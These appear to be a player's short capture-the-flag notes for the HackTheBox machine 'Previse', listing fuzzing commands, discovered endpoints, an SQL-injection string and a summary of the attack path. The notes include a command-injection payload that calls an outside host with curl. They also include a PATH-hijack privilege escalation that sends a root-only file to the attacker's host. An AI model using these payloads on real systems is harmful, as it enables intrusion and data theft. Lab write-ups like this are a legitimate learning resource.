Previse

1. Enumeration

ffuf -w /media/lrb/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.previse.htb" -u http://previse.htb -fc 301

ffuf -w ../burp-parameter-names.txt -u http://10.10.11.104/config.php?FUZZ=abcd

# Following endpoints are available:
http://10.10.11.104/nav.php
http://10.10.11.104/accounts.php
http://10.10.11.104/files.php
http://10.10.11.104/status.php
http://10.10.11.104/file_logs.php

1623978778,m4lwhere,32 http://10.10.11.104/download.php?file=32

cat file_logs | cut -d, -f3 | sort -n | uniq

config.php $user = 'root'; $passwd = '[redacted]';

user12';-- -

SELECT * FROM accounts WHERE username = '{$username}';

grep -ir "$_POST"

-logs.php delim=comma;curl+http%3a//10.10.14.2%3a7906

-mysql password contains salt and icons in text select TO_BASE64(password) from accounts where username="m4lwhere";

2. Priv Esc [ creating gzip executable in custom location ]

export PATH=/home/m4lwhere:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
nano gzip
curl http://10.10.14.5:7908/$(cat /root/root.txt)

---

Path:

• nav.php contains in-session app. pages • create user using response modification • Enumerating files by file ID • Possible cmd injection - Yup 'logs.php' • Horizontal PE to m4lwhere - hashed password in mysql DB is the same for system access • to root via cron ?